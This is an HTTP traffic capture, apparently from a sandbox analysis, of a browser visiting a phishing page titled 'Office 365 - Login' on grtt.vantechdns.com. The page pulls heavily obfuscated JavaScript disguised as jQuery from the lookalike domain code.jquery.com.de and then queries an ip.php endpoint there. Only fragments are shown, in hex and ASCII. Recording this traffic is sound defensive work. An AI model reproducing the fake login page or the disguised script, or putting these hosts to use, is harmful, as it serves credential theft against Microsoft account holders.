2025-01-19 23:19:23 UTC	3025	IN	Data Raw: 71 55 55 f7 26 18 79 ad 95 56 4c 9f 94 4d bf 3c 49 4c be bb 80 5f 4e bc 4f 53 57 c5 aa 2e 75 83 ba 6b a9 ba fa e5 30 cd cd c7 b8 40 5a 2f 48 95 e1 a1 a9 93 23 80 3c 43 fa 07 7c 2f 70 6f 0b 6d 29 61 06 78 90 ea bb 33 42 74 4f de 37 e6 f3 ce 92 56 de be f4 b0 57 ca fc 8b 94 9e a4 94 89 d0 d7 33 1d 05 f1 52 7e 7f 7f d7 5a 2b 9a f7 f3 c4 67 2d c5 b3 34 17 f6 53 96 2d d6 2d 82 35 ae 94 e7 6d 73 c7 de 33 54 ff 6c 5e ab 07 64 13 31 ff a3 8a 26 57 58 9e 27 6d d2 f2 b8 1b ec f5 52 8e 00 72 91 a8 b9 9f ea 00 e9 35 33 ba 68 17 f0 70 e2 7d 9e a5 99 bd 22 7c d3 c3 1b 54 af 95 31 4b 5a 50 54 77 bc 9f 7a e7 99 67 98 be 7d 59 ba e0 1c f0 6a c5 63 67 b8 fa e6 9d 9b a9 b6 b2 f0 79 9a 1b 7e 19 49 19 de ad 5b d9 b5 d7 72 04 10 88 f1 be d4 34 bd 40 84 90 49 9e bc b3 40 5a 25 Data Ascii: qUU&yVLM<IL_NOSW.uk0@Z/H#<C\|/pom)ax3BtO7VW3R~Z+g-4S--5ms3Tl^d1&WX'mRr53hp}"\|T1KZPTwzg}Yjcgy~I[r4@I@Z%

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:33 UTC	773	OUT	GET /bnnnnnnnnii99/new_87392/data/out.php HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:33 UTC	204	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2025-01-19 23:19:33 UTC	16180	IN	Data Raw: 31 66 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 66 66 69 63 65 20 33 36 35 20 2d 20 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 Data Ascii: 1f31<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Office 365 - Login</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, use
2025-01-19 23:19:33 UTC	5660	IN	Data Raw: 39 35 37 35 50 56 4d 43 66 4e 27 2c 27 77 72 69 74 65 27 2c 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 40 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 62 6c 69 6e 6b 57 61 72 6e 69 6e 67 5c 78 32 30 7b 27 2c 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 27 2c 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 Data Ascii: 9575PVMCfN','write','\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20@keyframes\x20blinkWarning\x20{','\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>','\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:34 UTC	540	OUT	GET /jquery-3.5.1.min.js HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:35 UTC	221	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:35 GMT Server: Apache Last-Modified: Sun, 10 Jul 2022 16:27:33 GMT Accept-Ranges: bytes Content-Length: 403295 Connection: close Content-Type: application/javascript
2025-01-19 23:19:35 UTC	7971	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 37 31 64 28 5f 30 78 31 34 35 32 36 61 2c 5f 30 78 33 62 62 64 38 38 29 7b 76 61 72 20 5f 30 78 31 36 30 34 64 38 3d 5f 30 78 33 66 61 38 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 37 31 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 65 37 64 66 2c 5f 30 78 31 62 64 64 64 36 29 7b 5f 30 78 32 62 65 37 64 66 3d 5f 30 78 32 62 65 37 64 66 2d 28 2d 30 78 32 65 2a 30 78 31 66 2b 30 78 36 2a 30 78 34 30 62 2b 2d 30 78 31 31 38 31 2a 30 78 31 29 3b 76 61 72 20 5f 30 78 32 61 62 65 62 39 3d 5f 30 78 31 36 30 34 64 38 5b 5f 30 78 32 62 65 37 64 66 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 61 62 65 62 39 3b 7d 2c 5f 30 78 31 37 31 64 28 5f 30 78 31 34 35 32 36 61 2c 5f 30 78 33 62 62 64 38 38 29 3b 7d 76 61 72 20 5f 30 78 33 39 Data Ascii: function _0x171d(_0x14526a,_0x3bbd88){var _0x1604d8=_0x3fa8();return _0x171d=function(_0x2be7df,_0x1bddd6){_0x2be7df=_0x2be7df-(-0x2e0x1f+0x60x40b+-0x1181*0x1);var _0x2abeb9=_0x1604d8[_0x2be7df];return _0x2abeb9;},_0x171d(_0x14526a,_0x3bbd88);}var _0x39
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 2c 27 62 65 72 62 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 39 61 36 38 2c 5f 30 78 33 66 31 30 61 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 61 39 61 36 38 2b 5f 30 78 33 66 31 30 61 62 3b 7d 2c 27 42 79 46 4a 57 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 33 65 34 38 2c 5f 30 78 31 66 65 33 66 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 34 33 65 34 38 3d 3d 3d 5f 30 78 31 66 65 33 66 38 3b 7d 2c 27 6f 74 69 6c 44 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 32 62 31 63 2c 5f 30 78 34 38 33 37 36 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 32 62 31 63 3d 3d 3d 5f 30 78 34 38 33 37 36 38 3b 7d 2c 27 4a 68 4d 4f 6d 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 34 65 29 2c 27 41 50 55 52 61 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 64 39 Data Ascii: ,'berbj':function(_0x3a9a68,_0x3f10ab){return _0x3a9a68+_0x3f10ab;},'ByFJW':function(_0x443e48,_0x1fe3f8){return _0x443e48===_0x1fe3f8;},'otilD':function(_0x122b1c,_0x483768){return _0x122b1c===_0x483768;},'JhMOm':_0x221323(0x14e),'APURa':function(_0x2dd9
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 27 6f 68 6a 57 70 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 66 30 35 61 2c 5f 30 78 32 65 32 38 35 36 2c 5f 30 78 35 36 33 33 36 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 63 66 30 35 61 28 5f 30 78 32 65 32 38 35 36 2c 5f 30 78 35 36 33 33 36 30 29 3b 7d 2c 27 79 49 69 77 4e 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 65 65 29 2c 27 74 42 7a 45 56 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 36 35 33 29 2c 27 62 43 69 4a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 64 38 31 66 62 33 2c 5f 30 78 31 38 66 62 33 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 64 38 31 66 62 33 3c 3d 5f 30 78 31 38 66 62 33 38 3b 7d 2c 27 6d 75 56 6e 6f 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 33 34 66 29 2c 27 48 6f 67 73 45 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 37 61 Data Ascii: 'ohjWp':function(_0x3cf05a,_0x2e2856,_0x563360){return _0x3cf05a(_0x2e2856,_0x563360);},'yIiwN':_0x221323(0x2ee),'tBzEV':_0x221323(0x653),'bCiJb':function(_0xd81fb3,_0x18fb38){return _0xd81fb3<=_0x18fb38;},'muVno':_0x221323(0x34f),'HogsE':function(_0x297a
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 37 33 66 63 2c 5f 30 78 35 62 62 34 65 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 62 37 33 66 63 3c 5f 30 78 35 62 62 34 65 31 3b 7d 2c 27 72 52 46 74 71 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 33 37 30 29 2c 27 59 4a 64 4e 79 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 66 61 36 31 38 2c 5f 30 78 34 30 39 38 36 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 39 66 61 36 31 38 7c 7c 5f 30 78 34 30 39 38 36 66 3b 7d 2c 27 47 4f 72 7a 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 34 36 34 62 66 2c 5f 30 78 34 38 35 35 66 33 2c 5f 30 78 32 63 61 30 61 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 34 36 34 62 66 28 5f 30 78 34 38 35 35 66 33 2c 5f 30 78 32 63 61 30 61 30 29 3b 7d 2c 27 55 7a 70 72 54 27 3a 5f 30 78 32 32 31 33 32 Data Ascii: unction(_0x2b73fc,_0x5bb4e1){return _0x2b73fc<_0x5bb4e1;},'rRFtq':_0x221323(0x370),'YJdNy':function(_0x9fa618,_0x40986f){return _0x9fa618\|\|_0x40986f;},'GOrzN':function(_0x3464bf,_0x4855f3,_0x2ca0a0){return _0x3464bf(_0x4855f3,_0x2ca0a0);},'UzprT':_0x22132
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 31 66 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 37 30 34 61 61 3d 3d 3d 5f 30 78 33 63 33 31 66 61 3b 7d 2c 27 4b 55 5a 43 43 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 61 63 36 36 33 35 2c 5f 30 78 32 33 39 62 62 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 63 36 36 33 35 3d 3d 3d 5f 30 78 32 33 39 62 62 33 3b 7d 2c 27 63 63 65 6c 44 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 38 62 30 29 2c 27 79 4f 78 41 63 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 33 61 30 66 37 2c 5f 30 78 35 62 61 65 32 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 33 61 30 66 37 3d 3d 3d 5f 30 78 35 62 61 65 32 35 3b 7d 2c 27 51 58 75 6c 56 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 36 32 29 2c 27 58 79 58 6c 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 32 34 38 30 35 2c 5f 30 78 34 Data Ascii: 1fa){return _0x5704aa===_0x3c31fa;},'KUZCC':function(_0xac6635,_0x239bb3){return _0xac6635===_0x239bb3;},'ccelD':_0x221323(0x8b0),'yOxAc':function(_0x53a0f7,_0x5bae25){return _0x53a0f7===_0x5bae25;},'QXulV':_0x221323(0x262),'XyXlR':function(_0x524805,_0x4
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 35 63 66 2c 5f 30 78 31 66 66 65 31 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 65 34 35 63 66 28 5f 30 78 31 66 66 65 31 33 29 3b 7d 2c 27 70 68 56 74 4c 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 31 38 29 2c 27 64 4d 76 67 4a 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 35 61 29 2c 27 61 67 4c 4c 4a 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 66 65 29 2c 27 66 58 78 71 61 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 36 37 64 30 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 37 64 30 62 28 29 3b 7d 2c 27 54 70 61 57 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 36 31 39 31 33 2c 5f 30 78 34 34 62 65 66 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 36 31 39 31 33 28 5f 30 78 34 34 62 65 66 30 29 3b 7d 2c 27 6e 6d 53 61 49 27 3a 66 75 6e 63 74 69 6f 6e 28 5f Data Ascii: 5cf,_0x1ffe13){return _0x1e45cf(_0x1ffe13);},'phVtL':_0x221323(0x218),'dMvgJ':_0x221323(0x15a),'agLLJ':_0x221323(0x1fe),'fXxqa':function(_0x167d0b){return _0x167d0b();},'TpaWk':function(_0x261913,_0x44bef0){return _0x261913(_0x44bef0);},'nmSaI':function(_
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 31 66 63 29 5d 28 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 31 63 63 29 5d 2c 5f 30 78 33 66 32 66 32 61 29 26 26 5f 30 78 33 66 32 66 32 61 5b 5f 30 78 31 65 32 61 35 33 28 30 78 34 37 30 29 5d 2c 5f 30 78 63 66 30 34 31 31 3d 5f 30 78 35 34 34 34 65 33 28 5f 30 78 33 66 32 66 32 61 29 3b 72 65 74 75 72 6e 21 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 37 32 66 29 5d 28 5f 30 78 34 38 39 34 38 34 2c 5f 30 78 33 66 32 66 32 61 29 26 26 21 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 37 32 66 29 5d 28 5f 30 78 34 37 30 65 62 61 2c 5f 30 78 33 66 32 66 32 61 29 26 26 28 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 38 62 36 29 Data Ascii: bc[_0x1e2a53(0x1fc)](_0x7a4abc[_0x1e2a53(0x1cc)],_0x3f2f2a)&&_0x3f2f2a[_0x1e2a53(0x470)],_0xcf0411=_0x5444e3(_0x3f2f2a);return!_0x7a4abc[_0x1e2a53(0x72f)](_0x489484,_0x3f2f2a)&&!_0x7a4abc[_0x1e2a53(0x72f)](_0x470eba,_0x3f2f2a)&&(_0x7a4abc[_0x1e2a53(0x8b6)
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 28 6e 75 6c 6c 2c 5f 30 78 32 37 32 30 38 64 3d 5f 30 78 35 34 61 62 64 35 28 5f 30 78 34 65 35 35 31 32 5b 5f 30 78 34 66 37 35 61 65 5d 2c 5f 30 78 34 66 37 35 61 65 2c 5f 30 78 31 65 65 39 66 30 29 29 26 26 5f 30 78 32 61 62 30 32 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 34 64 63 29 5d 28 5f 30 78 32 37 32 30 38 64 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 5f 30 78 34 66 37 35 61 65 20 69 6e 20 5f 30 78 34 65 35 35 31 32 29 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 32 38 38 29 5d 28 6e 75 6c 6c 2c 5f 30 78 32 37 32 30 38 64 3d 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 36 30 62 29 5d 28 5f 30 78 35 34 61 62 64 35 2c 5f 30 78 34 65 35 35 31 32 5b 5f 30 78 34 66 37 35 61 65 5d 2c 5f 30 78 34 66 37 35 61 65 2c 5f Data Ascii: (null,_0x27208d=_0x54abd5(_0x4e5512[_0x4f75ae],_0x4f75ae,_0x1ee9f0))&&_0x2ab02c[_0x950efb(0x4dc)](_0x27208d);}else{for(_0x4f75ae in _0x4e5512)_0x7a4abc[_0x950efb(0x288)](null,_0x27208d=_0x7a4abc[_0x950efb(0x60b)](_0x54abd5,_0x4e5512[_0x4f75ae],_0x4f75ae,_
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 37 65 29 7b 76 61 72 20 5f 30 78 31 34 61 64 32 64 3d 5f 30 78 33 34 37 38 37 63 3b 72 65 74 75 72 6e 20 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 34 61 64 32 64 28 30 78 34 61 31 29 5d 28 5f 30 78 31 61 65 37 30 39 2c 5f 30 78 35 34 33 37 37 65 29 3b 7d 2c 27 63 51 53 6e 6d 27 3a 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 34 37 38 37 63 28 30 78 31 34 61 29 5d 2c 27 45 6b 56 64 41 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 62 37 30 35 32 2c 5f 30 78 35 38 66 30 66 38 29 7b 76 61 72 20 5f 30 78 33 38 30 66 61 30 3d 5f 30 78 33 34 37 38 37 63 3b 72 65 74 75 72 6e 20 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 38 30 66 61 30 28 30 78 36 62 35 29 5d 28 5f 30 78 39 62 37 30 35 32 2c 5f 30 78 35 38 66 30 66 38 29 3b 7d 2c 27 6b 6c 77 56 51 27 3a 66 75 6e 63 74 Data Ascii: 7e){var _0x14ad2d=_0x34787c;return _0x7a4abc[_0x14ad2d(0x4a1)](_0x1ae709,_0x54377e);},'cQSnm':_0x7a4abc[_0x34787c(0x14a)],'EkVdA':function(_0x9b7052,_0x58f0f8){var _0x380fa0=_0x34787c;return _0x7a4abc[_0x380fa0(0x6b5)](_0x9b7052,_0x58f0f8);},'klwVQ':funct
2025-01-19 23:19:35 UTC	8000	IN	Data Raw: 30 38 32 2c 5f 30 78 35 62 63 61 35 63 2c 5f 30 78 35 64 35 62 30 30 3d 5f 30 78 33 34 37 38 37 63 28 30 78 31 38 36 29 2b 28 30 78 31 30 63 2a 30 78 31 2b 30 78 31 63 2a 2d 30 78 61 36 2b 30 78 31 2a 30 78 31 31 31 64 29 2a 6e 65 77 20 44 61 74 65 28 29 2c 5f 30 78 35 65 33 64 37 65 3d 5f 30 78 33 37 62 34 63 30 5b 5f 30 78 33 34 37 38 37 63 28 30 78 36 39 38 29 5d 2c 5f 30 78 36 32 36 66 38 39 3d 30 78 32 34 36 62 2a 2d 30 78 31 2b 30 78 36 31 64 2b 30 78 31 65 34 65 2c 5f 30 78 35 35 30 66 35 66 3d 30 78 34 2a 2d 30 78 36 64 39 2b 2d 30 78 31 32 32 2b 30 78 39 38 32 2a 30 78 33 2c 5f 30 78 33 64 34 34 64 35 3d 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 34 37 38 37 63 28 30 78 35 33 61 29 5d 28 5f 30 78 35 63 36 38 31 32 29 2c 5f 30 78 33 35 62 63 38 36 Data Ascii: 082,_0x5bca5c,_0x5d5b00=_0x34787c(0x186)+(0x10c0x1+0x1c-0xa6+0x10x111d)new Date(),_0x5e3d7e=_0x37b4c0[_0x34787c(0x698)],_0x626f89=0x246b-0x1+0x61d+0x1e4e,_0x550f5f=0x4-0x6d9+-0x122+0x982*0x3,_0x3d44d5=_0x7a4abc[_0x34787c(0x53a)](_0x5c6812),_0x35bc86

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:36 UTC	659	OUT	GET /bnnnnnnnnii99/new_87392/data/img/out.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:36 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:23 GMT Content-Type: image/png Content-Length: 22238 Connection: close Last-Modified: Mon, 07 Mar 2022 11:13:14 GMT Accept-Ranges: bytes
2025-01-19 23:19:36 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 00 00 00 00 d1 08 06 00 00 00 52 30 c0 1a 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 55 f5 49 44 41 54 78 da ed dd 79 9c 14 c5 fd ff f1 57 f5 ec c5 b5 e0 7d 81 07 de e0 0d c2 ce ec 62 c4 2b 9e f1 88 98 c4 24 1e 49 44 a3 21 30 b3 08 e4 30 ae 39 05 77 67 41 62 12 89 df fc 12 35 6a 20 1a 13 15 cf b8 2a bb 33 0b ae c6 23 78 c5 1b bc 13 85 e5 dc 63 ba 7e 7f 2c 5e 08 08 bb d5 b3 3d 33 ef e7 e3 e1 23 8f 24 6e 4d f7 a7 ba ab ab 3e 5d 5d 65 90 fc 33 a5 71 67 3a 22 23 30 fe 08 30 23 80 a1 24 63 c3 15 18 11 11 11 11 Data Ascii: PNGIHDRR0gAMAa cHRMz&u0`:pQ<bKGDUIDATxyW}b+$ID!009wgAb5j *3#xc~,^=3#$nM>]]e3qg:"#00#$c
2025-01-19 23:19:36 UTC	6060	IN	Data Raw: 56 ef df 1d 32 69 aa 9b bf 4a 5d c5 fd 05 1d eb 8b 1b fa 53 96 fe 03 98 71 01 fd c2 7b 14 79 5f a7 c6 f8 a1 3a ef ab 46 bd 4d 3c f5 1f 0c 7b bb e9 6f d9 9f 32 6e ee df 43 f3 89 c3 e6 1a d0 f1 53 2c 43 0b 67 e0 c8 3b 4e e6 b7 58 f6 57 43 dd 9b 9d ee d8 d3 24 52 37 e2 6a 6f f3 ae 3a fd 05 d5 e9 27 a9 8b de 9d 77 f1 9a b6 60 2b da cd 0d 40 c4 51 b0 7e ce 8c aa 15 59 3b fe 22 ff 27 74 7a 5f 03 fa 3a 2a 71 07 3a fd 7f 10 4f 55 52 1f 5b 93 77 f5 5d dd fc 3d 2c a7 39 2a 6d 19 d6 ce 50 a3 b3 c9 f6 68 11 f1 f4 e9 18 7b 27 50 ea b8 74 0f cc 1f 89 37 75 52 5f 79 4b 50 a7 a0 4f 00 44 a4 f7 cd 19 b9 9a 8c ff 65 a0 35 c0 5f d9 1a eb cf 27 de 54 5d b0 5b 03 55 37 0f a3 ac 74 11 ee b7 fa fb 50 06 6b ce 0e ed 5b 16 c3 83 0e 4b 1b ce 90 c1 5f cf a9 fa 9f dc 74 12 d6 c6 0b Data Ascii: V2iJ]Sq{y_:FM<{o2nCS,Cg;NXWC$R7jo:'w`+@Q~Y;"'tz_:q:OUR[w]=,9mPh{'Pt7uR_yKPODe5_'T][U7tPk[K_t

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:36 UTC	659	OUT	GET /bnnnnnnnnii99/new_87392/assets/ms-bg.jpg HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:37 UTC	186	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 19 Jan 2025 23:19:23 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding
2025-01-19 23:19:37 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:37 UTC	560	OUT	GET /ip.php HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
